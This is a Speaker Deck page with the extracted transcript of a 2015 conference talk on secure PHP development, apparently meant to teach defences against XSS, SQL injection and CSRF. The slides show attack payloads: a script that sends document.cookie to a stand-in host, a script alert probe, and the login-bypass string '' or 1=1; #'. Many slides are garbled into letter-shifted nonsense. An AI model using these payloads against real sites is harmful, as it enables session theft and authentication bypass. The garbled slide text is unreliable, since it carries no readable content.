Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
Secure PHP Bootcamp
Chris Cornutt
January 23, 2015
Technology
0
440
Secure PHP Bootcamp
Given at PHP Benelux 2015
Chris Cornutt
January 23, 2015
Tweet
Share
More Decks by Chris Cornutt
See All by Chris Cornutt
Securing Legacy Applications
ccornutt
0
75
Pentesting for Developers
ccornutt
0
80
Securing Legacy Applications - Longhorn PHP 2018
ccornutt
1
130
Pieces of Auth
ccornutt
0
270
Securing Legacy Applications
ccornutt
0
220
Build Security In
ccornutt
0
130
Introduction to Slim 3
ccornutt
0
110
Securing Legacy Applications
ccornutt
0
32
PHP Security, Redfined
ccornutt
0
200
Other Decks in Technology
See All in Technology
Adopting Kafka for the #1 job site in the world
ymyzk
1
660
次期LTSに備えよ!AOS 6.1 HCI Core 編
smzksts
0
180
LINEのData Platform室が実践する大規模分散環境のCapacity Planning
line_developers
PRO
0
660
New Features in C# 10/11
chack411
0
980
ニフティでSRE推進活動を始めて取り組んできたこと
niftycorp
2
610
プログラミング未経験の学生をエンジニアにしてきたノウハウを公開
shinofumijp
0
110
LIFF Deep Dive 2022
line_developers
PRO
1
570
toilを解消した話
asumaywy
0
210
CTOのためのQAのつくりかた #scrumniigata / SigSQA How to create QA for CTOs and VPoEs
caori_t
0
320
プロダクション環境の信頼性を損ねず観測する技術
egmc
4
720
アルプでのAgile Testing / Alp Agile Testing
nametake
0
180
長年運用されてきたモノリシックアプリケーションをコンテナ化しようとするとどんな問題に遭遇するか? / SRE NEXT 2022
nulabinc
PRO
15
7.9k
Featured
See All Featured
Bash Introduction
62gerente
596
210k
Agile that works and the tools we love
rasmusluckow
319
19k
Thoughts on Productivity
jonyablonski
43
2.2k
Fireside Chat
paigeccino
11
1.3k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
498
130k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
349
27k
GraphQLの誤解/rethinking-graphql
sonatard
24
6.2k
What the flash - Photography Introduction
edds
61
10k
Adopting Sorbet at Scale
ufuk
63
7.5k
Java REST API Framework Comparison - PWX 2021
mraible
PRO
11
4.6k
Code Reviewing Like a Champion
maltzj
506
37k
Faster Mobile Websites
deanohume
294
28k
Transcript
Secure PHP Development $ISJT$PSOVUU!FOZHNB
https://jetbrains.com
Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT
1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN
IUUQCJUMZPXBTQUPQ
5IFSF`T OPTVDIUIJOH BTTFDVSF
IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO
IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN
None
XSS: Cross Site Scripting
*OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH
Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>
Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);
xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG
Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );
echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU
Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)
}} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH
SQLi: SQL Injection
*OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH
Example $sql = ‘select id from users where username =
“‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH
BEE@TMBTIFT NZTRM@SFBM@FTDBQF@TUSJOH NZTRMJ@SFBM@FTDBQF@TUSJOH X
Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where
username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU
CSRF: Cross Site Request Forgery
VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF TJNQMF SBOEPNJ[FE GPSFBDIGPSN
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> </form>
Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>
<input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>
Auth*: Authentication & Authorization
EJSFDUPCKFDUSFGFSFODF " EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU
QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT
None
None
And…
4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET
5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN